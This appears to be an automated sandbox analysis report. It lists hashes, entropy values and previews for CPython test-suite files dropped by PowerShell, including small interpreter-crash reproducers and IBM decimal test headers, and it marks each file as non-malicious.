                                                                                                                                                                                                                      SHA-256:668BAB7D208440A20EC4160E9C80802838E166B56178F66B796552E7CB5FE482
                                                                                                                                                                                                                      SHA-512:576F77168311E648DAD37559AA8144524B2017ADE1756F1ECC1626782838E42652A693D0BE4AB71C406377EFA5A0BA1E99BB4FCF24CF00868D7E597911412324
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:"""..From http://bugs.python.org/issue6717....A misbehaving trace hook can trigger a segfault by exceeding the recursion..limit..."""..import sys......def x():.. pass....def g(*args):.. if True: # change to True to crash interpreter.. try:.. x().. except:.. pass.. return g....def f():.. print(sys.getrecursionlimit()).. f()....sys.settrace(g)....f()..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):302
                                                                                                                                                                                                                      Entropy (8bit):4.640719599083337
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:6:irY2cqNb5U/WFFF4yOya5az3yuh21qmw0YFIoo6v3qsFL24ME9MLjpn:uY2ckU+3Maz3yuhRmwTICSsFPME9en
                                                                                                                                                                                                                      MD5:B8B5B66C35D070C252EEA489CD583774
                                                                                                                                                                                                                      SHA1:C9266F4FBD34CFBD463930A50C19379BAF1207CE
                                                                                                                                                                                                                      SHA-256:95DBF034378968FDC6D2D02D689948E1D40333B37A1B520B2D774D8ECA6F0E9C
                                                                                                                                                                                                                      SHA-512:679B21C759CF148B225FF6E9BB8F08CDC74D2EE23E5AAFB9436C5F46DB31188B17FD20BBB0C92E43BBEED99EC9D9CD20345B6C1DB03EB37A10326F1E22BBBC4D
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:import gc....thingy = object()..class A(object):.. def f(self):.. return 1.. x = thingy....r = gc.get_referrers(thingy)..if "__module__" in r[0]:.. dct = r[0]..else:.. dct = r[1]....a = A()..for i in range(10):.. a.f()..dct["f"] = lambda self: 2....print(a.f()) # should print 1..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1288
                                                                                                                                                                                                                      Entropy (8bit):4.809303440622238
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:QBIcJmJWgFmXzNv2Oey/0ewPVtrPMGo0GtIYjiXY1akjyntqpaQawM:UMDmzNv2nyvGtMICIYjiXYB2tqpaQap
                                                                                                                                                                                                                      MD5:D8EBD8C97B71487ACCC4786DFEC5C1A3
                                                                                                                                                                                                                      SHA1:B4CFAF31CB181C10E5640F74B6C1BAC9FAB27E2F
                                                                                                                                                                                                                      SHA-256:E772591F017A9F0B46CDD86B3BF612CFAAB45D89B367F155789A6B5EE7E95C20
                                                                                                                                                                                                                      SHA-512:3E8C6B7EE95DF00589153A4BD9C7B92AC72ABB675FE595E13535B7AE268B60E32CC5615D9A7DEBD759104BB704C3BD01B36A751F03B7FB2127DEF0A7531EB552
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:#!/usr/bin/env python3..#..# $Id: ncurses.py 36559 2004-07-18 05:56:09Z tim_one $..#..# Interactive test suite for the curses module...# This script displays various things and the user should verify whether..# they display correctly...#....import curses..from curses import textpad....def test_textpad(stdscr, insert_mode=False):.. ncols, nlines = 8, 3.. uly, ulx = 3, 2.. if insert_mode:.. mode = 'insert mode'.. else:.. mode = 'overwrite mode'.... stdscr.addstr(uly-3, ulx, "Use Ctrl-G to end editing (%s)." % mode).. stdscr.addstr(uly-2, ulx, "Be sure to try typing in the lower-right corner.").. win = curses.newwin(nlines, ncols, uly, ulx).. textpad.rectangle(stdscr, uly-1, ulx-1, uly + nlines, ulx + ncols).. stdscr.refresh().... box = textpad.Textbox(win, insert_mode).. contents = box.edit().. stdscr.addstr(uly+ncols+2, 0, "Text entered in the box\n").. stdscr.addstr(repr(contents)).. stdscr.addstr('\n').. stdscr.addstr('Press a
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):131
                                                                                                                                                                                                                      Entropy (8bit):4.211143298625367
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:3:hActHHDAWFEXwRRKDM5cAWyvIFWKnmOqMGQIFrUejIEV9z9B:hrtHHVReKczyvIsKmO3IZP0w9B
                                                                                                                                                                                                                      MD5:8A50CF8D023A17B27A59AEDD464CB383
                                                                                                                                                                                                                      SHA1:0DA12109EBD12311C6AF6FD5ACC992F43483E1A4
                                                                                                                                                                                                                      SHA-256:D66BD8CE5390854F3CDB0C06E348AE5E6B12E128F168B2D23E7D2B764326BA5C
                                                                                                                                                                                                                      SHA-512:A0220B5C5F68E3769420004769AD010DB3A9A86EE9401371C7576C4EFDE26C6187A206D480463B85C47B3B1CCE9FE485ECA675D78FAB4F540A12A9A46D89167F
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:This empty directory serves as destination for temporary files..created by some tests, in particular, the test_codecmaps_* tests...
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):273200
                                                                                                                                                                                                                      Entropy (8bit):4.624441621983499
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:3072:EZ30zI+cjQ/fQugzM8vLLKY5KlwBUWYrGoPjysy7+44H+/:ESzl/fQugA8vLLKY5KlwBNYdbyB7+4X
                                                                                                                                                                                                                      MD5:1F3469FBC15346D2EA9E6A1690CFCD4B
                                                                                                                                                                                                                      SHA1:A6A35087776AFD8EB1867B834DD094C095CA6A61
                                                                                                                                                                                                                      SHA-256:A1593EE37FA36AF3EF7ACF05C411D96B0ABB140419312ACABE01766CEFB75E2B
                                                                                                                                                                                                                      SHA-512:1E0F748FD5BCE281E08F7558517530FD82BD3C7500C3571FE7517951BF3DC75B751B8243FEA89FD51631F26E6A8E18D0E614E232BFC7926D352C6D3723935BD8
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:"""Test date/time type.....See https://www.zope.dev/Members/fdrake/DateTimeWiki/TestCases.."""..import bisect..import copy..import decimal..import io..import itertools..import os..import pickle..import random..import re..import struct..import sys..import unittest..import warnings....from array import array....from operator import lt, le, gt, ge, eq, ne, truediv, floordiv, mod....from test import support..from test.support import is_resource_enabled, ALWAYS_EQ, LARGEST, SMALLEST....import datetime as datetime_module..from datetime import MINYEAR, MAXYEAR..from datetime import timedelta..from datetime import tzinfo..from datetime import time..from datetime import timezone..from datetime import UTC..from datetime import date, datetime..import time as _time....try:.. import _testcapi..except ImportError:.. _testcapi = None....# Needed by test_datetime..import _strptime..try:.. import _pydatetime..except ImportError:.. pass..#....pickle_loads = {pickle.loads, pickle._loads}....p
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):6290
                                                                                                                                                                                                                      Entropy (8bit):4.657353627962795
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:96:LS0iiUQ7tJG49xAuWaojJ9+JrJ7JaJiJkJa+JGJ2JHJPJ8nmJxJNJCH:+inBWWtdQ4abMcpR8nszvA
                                                                                                                                                                                                                      MD5:E8D31119EADB1B504BB552732C40ED02
                                                                                                                                                                                                                      SHA1:2C1890A2D9550B8E1C4DFEA4921928EF6947A8EA
                                                                                                                                                                                                                      SHA-256:C8A8B1C618B693F0473338EF78315F7DC3462B0C3BC33C0B6024F72D6C10C4E7
                                                                                                                                                                                                                      SHA-512:CB9F6BDB8EBB10DAD5B8BD9EAD995965DE3BBAA7B76CCE837F189D4DBFB45663305BBC918B062D82745AFA5532F78E3CE36EE50F3539C9A9715A40B8BE07D174
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:------------------------------------------------------------------------.-- abs.decTest -- decimal absolute value --.-- Copyright (c) IBM Corporation, 1981, 2008. All rights reserved. --.------------------------------------------------------------------------.-- Please see the document "General Decimal Arithmetic Testcases" --.-- at http://www2.hursley.ibm.com/decimal for the description of --.-- these testcases. --.-- --.-- These testcases are experimental ('beta' versions), and they --.-- may contain errors. They are offered on an as-is basis. In --.-- particular, achieving the same results as the tests here is not --.-- a guarantee that an implementation complies with any Standard --.-- or specification. The tests are not exhaustive. --.--
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):140338
                                                                                                                                                                                                                      Entropy (8bit):4.552380300391761
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:1536:x2FV1xm/LX54pCIxvVxSYWI0TcfpdkPB75c0h3f/62JJYezcUEBZfHwod0:x2FV1x0zcUmZov
                                                                                                                                                                                                                      MD5:D4700CA4B0FAF60288608C36AF59D177
                                                                                                                                                                                                                      SHA1:F529844E11B4F2666FAE4178634280E1BF26B416
                                                                                                                                                                                                                      SHA-256:C807FF5789D9236766419D5DA5E6E2B07229A255F3BB5746169D3E1B00DDFC6A
                                                                                                                                                                                                                      SHA-512:12915600762A5737B0EE2A3C28CB6061703CE6B7C9390B6EADA44BE1660C978D723EC1EF3439D10144F06DD8FE5B2580D34574D7B3BAA3C26E68B6C94C3323C0
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:------/cancell----------------------------------------------------------.-- add.decTest -- decimal addition --.-- Copyright (c) IBM Corporation, 1981, 2008. All rights reserved. --.------------------------------------------------------------------------.-- Please see the document "General Decimal Arithmetic Testcases" --.-- at http://www2.hursley.ibm.com/decimal for the description of --.-- these testcases. --.-- --.-- These testcases are experimental ('beta' versions), and they --.-- may contain errors. They are offered on an as-is basis. In --.-- particular, achieving the same results as the tests here is not --.-- a guarantee that an implementation complies with any Standard --.-- or specification. The tests are not exhaustive. --.--
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):16364
                                                                                                                                                                                                                      Entropy (8bit):4.29478702458993
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:96:LpoBkGiQHdaQUoz/tiw2SAvEdHLMYqv4hmgC+hLi9AXOoGhmwMEcYUk0PrucLGeQ:skoN7mhmwMEcYUk0jtKuVG9SLqFHEkHB
                                                                                                                                                                                                                      MD5:49471DFE3024A96AD27833930D1C0016
                                                                                                                                                                                                                      SHA1:58C1C201094C1AF9B9A9FDCC270D3351AAAA020A
                                                                                                                                                                                                                      SHA-256:ADE5A5CCF2480560B9638148842270D01B9FBA615A1645803E05BFAC94C9F46B
                                                                                                                                                                                                                      SHA-512:0D6BB821D43A8B482FC84C468063E8FB7B9097232B0ACBBCB91C19F863018851BEEE7E8E5255E7B741A42F6603D784113BFB9477529CCBAC4C72F510F64917D1
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:------------------------------------------------------------------------..-- and.decTest -- digitwise logical AND --..-- Copyright (c) IBM Corporation, 1981, 2008. All rights reserved. --..------------------------------------------------------------------------..-- Please see the document "General Decimal Arithmetic Testcases" --..-- at http://www2.hursley.ibm.com/decimal for the description of --..-- these testcases. --..-- --..-- These testcases are experimental ('beta' versions), and they --..-- may contain errors. They are offered on an as-is basis. In --..-- particular, achieving the same results as the tests here is not --..-- a guarantee that an implementation complies with any Standard --..-- or specification. The tests are not exhaustive. --..--
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):61355
                                                                                                                                                                                                                      Entropy (8bit):4.793649205464018
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:384:3Z7MprVXMtcUwWlcLVl6bbRyvekBHcCni4O5vgcm57bBAqmW5XFd+Vy8S9nQEzq3:A4lcLebbRdCRL5XuJS9nfzq46YWAq
                                                                                                                                                                                                                      MD5:3DC47E2E805850C4089883A998124B33
                                                                                                                                                                                                                      SHA1:85436B426472F9E4CC0B58997AEF5BA313981710
                                                                                                                                                                                                                      SHA-256:7EA4E03BC24630D2CE308498959D856506503097B8FF85294B741D38069B3309
                                                                                                                                                                                                                      SHA-512:6144CCFD7F65C51D8FEC124586AE51FFE649ED544CAC27FB74378313A63ED753FC12163814BF02F2442DE94BB5C0C63A605E01C0E41BCF23157E94A4C3392707
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:------------------------------------------------------------------------.-- base.decTest -- base decimal <--> string conversions --.-- Copyright (c) IBM Corporation, 1981, 2008. All rights reserved. --.------------------------------------------------------------------------.-- Please see the document "General Decimal Arithmetic Testcases" --.-- at http://www2.hursley.ibm.com/decimal for the description of --.-- these testcases. --.-- --.-- These testcases are experimental ('beta' versions), and they --.-- may contain errors. They are offered on an as-is basis. In --.-- particular, achieving the same results as the tests here is not --.-- a guarantee that an implementation complies with any Standard --.-- or specification. The tests are not exhaustive. --.--
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):11009
                                                                                                                                                                                                                      Entropy (8bit):4.322450767660683
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:QinYcg7Dzc+Ri5Mn25sLPZTqEkf5YHMrmlAVg1RKh4+sj9hofBAPzA:wcsDzD1TWgPGsjfGP
                                                                                                                                                                                                                      MD5:970BE13D862D11A5A0900A8E42F656F4
                                                                                                                                                                                                                      SHA1:FC7CCDFCB44271D56E5AB7E8024755763B7AC599
                                                                                                                                                                                                                      SHA-256:7B0907453745EF5721D89C77FC1C48503474260B458F24127E1B3F0BFE11DBC3
                                                                                                                                                                                                                      SHA-512:FFDF62D5D6995EE7D6D5BD43FBFE8779B4BCE146931DEA15AA76AB2C8EB267A8CD4307778233F5CB42826F9E1AD4F1DC79BFE27D60E9F7EF543C7F82C7B3FB6B
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:------------------------------------------------------------------------.-- clamp.decTest -- clamped exponent tests (format-independent) --.-- Copyright (c) IBM Corporation, 2000, 2008. All rights reserved. --.------------------------------------------------------------------------.-- Please see the document "General Decimal Arithmetic Testcases" --.-- at http://www2.hursley.ibm.com/decimal for the description of --.-- these testcases. --.-- --.-- These testcases are experimental ('beta' versions), and they --.-- may contain errors. They are offered on an as-is basis. In --.-- particular, achieving the same results as the tests here is not --.-- a guarantee that an implementation complies with any Standard --.-- or specification. The tests are not exhaustive. --.--
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):6376
                                                                                                                                                                                                                      Entropy (8bit):3.838969859666098
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:48:LBFH/AQqBKGiQwedyvAZC7RLyOiWbDafujqkzSkk/yAJZjriDb9P5yeu3AIrofjN:LBFoBkGiQHdaK6We3ZEP32GAVLnHWmr
                                                                                                                                                                                                                      MD5:DE46757B087EA3023F45787C50488140
                                                                                                                                                                                                                      SHA1:8E263A916B62F3463B0C8981DBD8090348DDC733
                                                                                                                                                                                                                      SHA-256:D643DBEB4125C5511ACFBF917CC8141CCEB06E76E4F0FEF30ADF25FF1B12863A
                                                                                                                                                                                                                      SHA-512:43490DEBDE4717C5BCEFCCC77008F718BA1F654E9A08D5CA573D9B8069E29E205F96D59CFEFFB706DD8D730317B889FE11267B09BB437B84D740298FC5B718AF
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:------------------------------------------------------------------------..-- class.decTest -- Class operations --..-- Copyright (c) IBM Corporation, 1981, 2008. All rights reserved. --..------------------------------------------------------------------------..-- Please see the document "General Decimal Arithmetic Testcases" --..-- at http://www2.hursley.ibm.com/decimal for the description of --..-- these testcases. --..-- --..-- These testcases are experimental ('beta' versions), and they --..-- may contain errors. They are offered on an as-is basis. In --..-- particular, achieving the same results as the tests here is not --..-- a guarantee that an implementation complies with any Standard --..-- or specification. The tests are not exhaustive. --..--
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):29627
                                                                                                                                                                                                                      Entropy (8bit):4.338436325439246
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:384:S2+lQdHzap51BNBnMig1/deC5inr3/KXlQOJIE0M9+PsicpfONkeVOWsFPeDRK6p:b+eFzLgsicpKDRKI
                                                                                                                                                                                                                      MD5:004827044D40034F93B75BCF7325B7F1
                                                                                                                                                                                                                      SHA1:21D94E589442151A3846DEE3996A0FAF9AA6C323
                                                                                                                                                                                                                      SHA-256:72B4A13B865A333DCF9B94A3C88D25800227D5B0AFECEF97980B685F9D850495
                                                                                                                                                                                                                      SHA-512:3710370392046B77E840DBFB09F3885EC93AEE878F3ED4BA090287857A2292F51AAE2926AC748E106B992AC2D6901F1C2C71412FA3762E0187A04DBDA35E4D7D
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:------------------------------------------------------------------------.-- compare.decTest -- decimal comparison that allows quiet NaNs --.-- Copyright (c) IBM Corporation, 1981, 2008. All rights reserved. --.------------------------------------------------------------------------.-- Please see the document "General Decimal Arithmetic Testcases" --.-- at http://www2.hursley.ibm.com/decimal for the description of --.-- these testcases. --.-- --.-- These testcases are experimental ('beta' versions), and they --.-- may contain errors. They are offered on an as-is basis. In --.-- particular, achieving the same results as the tests here is not --.-- a guarantee that an implementation complies with any Standard --.-- or specification. The tests are not exhaustive. --.--
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):34423
                                                                                                                                                                                                                      Entropy (8bit):4.448757580430056
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:384:N1oL5Wi7C9/8XRVk+umQxpVRe68JWHkqP:4ExpVRe681qP
                                                                                                                                                                                                                      MD5:9AB67EBBCC015D1BD3664BA9372142A3
                                                                                                                                                                                                                      SHA1:A52D8E0933C8DD16B1EAD0ABC36808E5011A5748
                                                                                                                                                                                                                      SHA-256:01EAEA73444519136A6572C2EB6EA958D0D38F3223C6805B91FF4464B61A3983
                                                                                                                                                                                                                      SHA-512:81D5BDE99E238FCD6C66DD716F34CBC129F48CE6B58AD72CA5DB969BA3820E69CC1ECB2A5FF41CB9DD3FD152A55669B15653A7C375CC970E9BE7ABB43C26B49D
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:------------------------------------------------------------------------..-- comparetotal.decTest -- decimal comparison using total ordering --..-- Copyright (c) IBM Corporation, 1981, 2008. All rights reserved. --..------------------------------------------------------------------------..-- Please see the document "General Decimal Arithmetic Testcases" --..-- at http://www2.hursley.ibm.com/decimal for the description of --..-- these testcases. --..-- --..-- These testcases are experimental ('beta' versions), and they --..-- may contain errors. They are offered on an as-is basis. In --..-- particular, achieving the same results as the tests here is not --..-- a guarantee that an implementation complies with any Standard --..-- or specification. The tests are not exhaustive. --..--
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):36129
                                                                                                                                                                                                                      Entropy (8bit):4.380427482933125
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:384:JIaIGN2szEF+Pgh67lROn81irwpugiAu32/SvucN:AG3zEF+Pgh67lROn81irwpuFAu32DcN
                                                                                                                                                                                                                      MD5:FC5BD9AF7DC55F79FAE0D2F49F4EEAEB
                                                                                                                                                                                                                      SHA1:549FB37079E56D9C9A372A9DF1D242F16E9AC90B
                                                                                                                                                                                                                      SHA-256:B89D53697530BB18933DE6E01D98D72E7A39DE2D946E5BFAEB38DE7340F083A9
                                                                                                                                                                                                                      SHA-512:AAE0DED00A210D6E62A0E2B8FE5A41B8E8101FA8561BFBDC04EBF630F2BEB1526BBEAE42554BED83972E17DD77678AA4DB3312E92DE9CF57CE09B1406CA161FB
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:------------------------------------------------------------------------..-- comparetotmag.decTest -- decimal comparison, abs. total ordering --..-- Copyright (c) IBM Corporation, 1981, 2008. All rights reserved. --..------------------------------------------------------------------------..-- Please see the document "General Decimal Arithmetic Testcases" --..-- at http://www2.hursley.ibm.com/decimal for the description of --..-- these testcases. --..-- --..-- These testcases are experimental ('beta' versions), and they --..-- may contain errors. They are offered on an as-is basis. In --..-- particular, achieving the same results as the tests here is not --..-- a guarantee that an implementation complies with any Standard --..-- or specification. The tests are not exhaustive. --..--
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):3376
                                                                                                                                                                                                                      Entropy (8bit):4.341814072290393
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:48:LxH/AQqBKGiQwedyvQF4wASOZxbY1xI84Dfv7PKefewLmu8kp5vGmnUq:LxoBkGiQHdaQF5Luv7PKSP4kp5vpN
                                                                                                                                                                                                                      MD5:CA95F81DF6EE6DADBB9433BF50EB3109
                                                                                                                                                                                                                      SHA1:A563DE2D85245F98C17C3AF569E8EC66433C2F7B
                                                                                                                                                                                                                      SHA-256:02DE30424D9642545E1CDB566B895C61FC537AD4E11F309D225344824CB61ED4
                                                                                                                                                                                                                      SHA-512:9722FD79F66BC7E55DBBA54157AE8AECEFA818B030DC307AFB6CD3D1D124941B8ECCEE91C79AEBF8C29B37AC97A013B1D6E11EAFC427EA863B8FD797C4329A34
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:------------------------------------------------------------------------..-- copy.decTest -- quiet copy --..-- Copyright (c) IBM Corporation, 1981, 2008. All rights reserved. --..------------------------------------------------------------------------..-- Please see the document "General Decimal Arithmetic Testcases" --..-- at http://www2.hursley.ibm.com/decimal for the description of --..-- these testcases. --..-- --..-- These testcases are experimental ('beta' versions), and they --..-- may contain errors. They are offered on an as-is basis. In --..-- particular, achieving the same results as the tests here is not --..-- a guarantee that an implementation complies with any Standard --..-- or specification. The tests are not exhaustive. --..--
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):3484
                                                                                                                                                                                                                      Entropy (8bit):4.420106814164126
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:48:LaH/AQqBKGiQwedyvQtEnfffWn3yQ7AX+A8gDnNpZhfb+2oH0jTRzBZFZu29CIvp:LaoBkGiQHdaQt3aviCIoh9NQkZklO
                                                                                                                                                                                                                      MD5:8CAFFE3E0669DF6FDFD801BA55C9CE11
                                                                                                                                                                                                                      SHA1:8447FE53AAB61A48B16FAEC6C90C228DA5877D11
                                                                                                                                                                                                                      SHA-256:2EDFC5C30DA21615A6B7163097D49301FB6EE70792D5DD74F9C5FC47D85E4DBE
                                                                                                                                                                                                                      SHA-512:BC167F4018DB7A993B0845B13BAE08FB33FFDA12C89EF0C5FC4B604BF805E8843423A715812CF16FAAB4F331E0DE159D736B2433265AF5C5EDF390A8CC56DBED
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:------------------------------------------------------------------------..-- copyAbs.decTest -- quiet copy and set sign to zero --..-- Copyright (c) IBM Corporation, 1981, 2008. All rights reserved. --..------------------------------------------------------------------------..-- Please see the document "General Decimal Arithmetic Testcases" --..-- at http://www2.hursley.ibm.com/decimal for the description of --..-- these testcases. --..-- --..-- These testcases are experimental ('beta' versions), and they --..-- may contain errors. They are offered on an as-is basis. In --..-- particular, achieving the same results as the tests here is not --..-- a guarantee that an implementation complies with any Standard --..-- or specification. The tests are not exhaustive. --..--
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):3673
                                                                                                                                                                                                                      Entropy (8bit):4.406035641168825
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:48:LmH/AQqBKGiQwedyvQExZfFoJdCfrsHPJVeZe+OOTkkhV0B41:LmoBkGiQHdaQOUC4HPJVCVTkkCY
                                                                                                                                                                                                                      MD5:4CD95C33B4CC2E59514F3555BCBB451F
                                                                                                                                                                                                                      SHA1:BDC21907146890D22477ED3AD0750992AD10176B
                                                                                                                                                                                                                      SHA-256:F1E732A7567E3EE4EB0B1CE4D5F99737532622E77A365E8773AE3273264868CE
                                                                                                                                                                                                                      SHA-512:0381AABA171809D1C58CD43930DDB61A6666F35B09C43F3943E87D5096D8CA0D7578D022206D3F9F2057418CBDED571F5FF9DF12A73854DC3591B28D492FC52B
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:------------------------------------------------------------------------..-- copyNegate.decTest -- quiet copy and negate --..-- Copyright (c) IBM Corporation, 1981, 2008. All rights reserved. --..------------------------------------------------------------------------..-- Please see the document "General Decimal Arithmetic Testcases" --..-- at http://www2.hursley.ibm.com/decimal for the description of --..-- these testcases. --..-- --..-- These testcases are experimental ('beta' versions), and they --..-- may contain errors. They are offered on an as-is basis. In --..-- particular, achieving the same results as the tests here is not --..-- a guarantee that an implementation complies with any Standard --..-- or specification. The tests are not exhaustive. --..--
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):7378
                                                                                                                                                                                                                      Entropy (8bit):4.331313482168246
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:96:LioBkGiQHdaQZZdjRng02en9SclSf+f6uK85t5Y7nTQTfuKOeeB:tkodCe9SaSq3/Y7nTQTUB
                                                                                                                                                                                                                      MD5:7144E0C996A4FD1D1E2EB5EC68650C65
                                                                                                                                                                                                                      SHA1:8D66AC8A5400EB485B0994AF5814D15321887C63
                                                                                                                                                                                                                      SHA-256:DC029F6E776F414660996C23D3522DECA07327E8B1D397ACA00EB4B06F8FCE3F
                                                                                                                                                                                                                      SHA-512:A11EFA331F3567A1A9A013045FA54EF6F329D2FC7A245F814C05D519CDF9B5ED8F37E00DD70C5BBF569DCF997A95CE5A55CC37858976E87FB6BD13C7FD3ABCB8
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:------------------------------------------------------------------------..-- copysign.decTest -- quiet copy with sign from rhs --..-- Copyright (c) IBM Corporation, 1981, 2008. All rights reserved. --..------------------------------------------------------------------------..-- Please see the document "General Decimal Arithmetic Testcases" --..-- at http://www2.hursley.ibm.com/decimal for the description of --..-- these testcases. --..-- --..-- These testcases are experimental ('beta' versions), and they --..-- may contain errors. They are offered on an as-is basis. In --..-- particular, achieving the same results as the tests here is not --..-- a guarantee that an implementation complies with any Standard --..-- or specification. The tests are not exhaustive. --..--
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):4901
                                                                                                                                                                                                                      Entropy (8bit):4.53619618426405
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:96:LiPoBkGiQHdaVI+ejAhkdnMiyFFZFFJFF9FF3c:+ikoQIlK4nMjFFZFFJFF9FFs
                                                                                                                                                                                                                      MD5:97E2C2E3F5B9A8BFDB2A412D8F0DB713
                                                                                                                                                                                                                      SHA1:80CE6434E2A8C6554198E94ACA619AA4E925F164
                                                                                                                                                                                                                      SHA-256:A3D752A7BD753E36A2DBFD537621A4902794AF4D614626325A5E6D850BAA967A
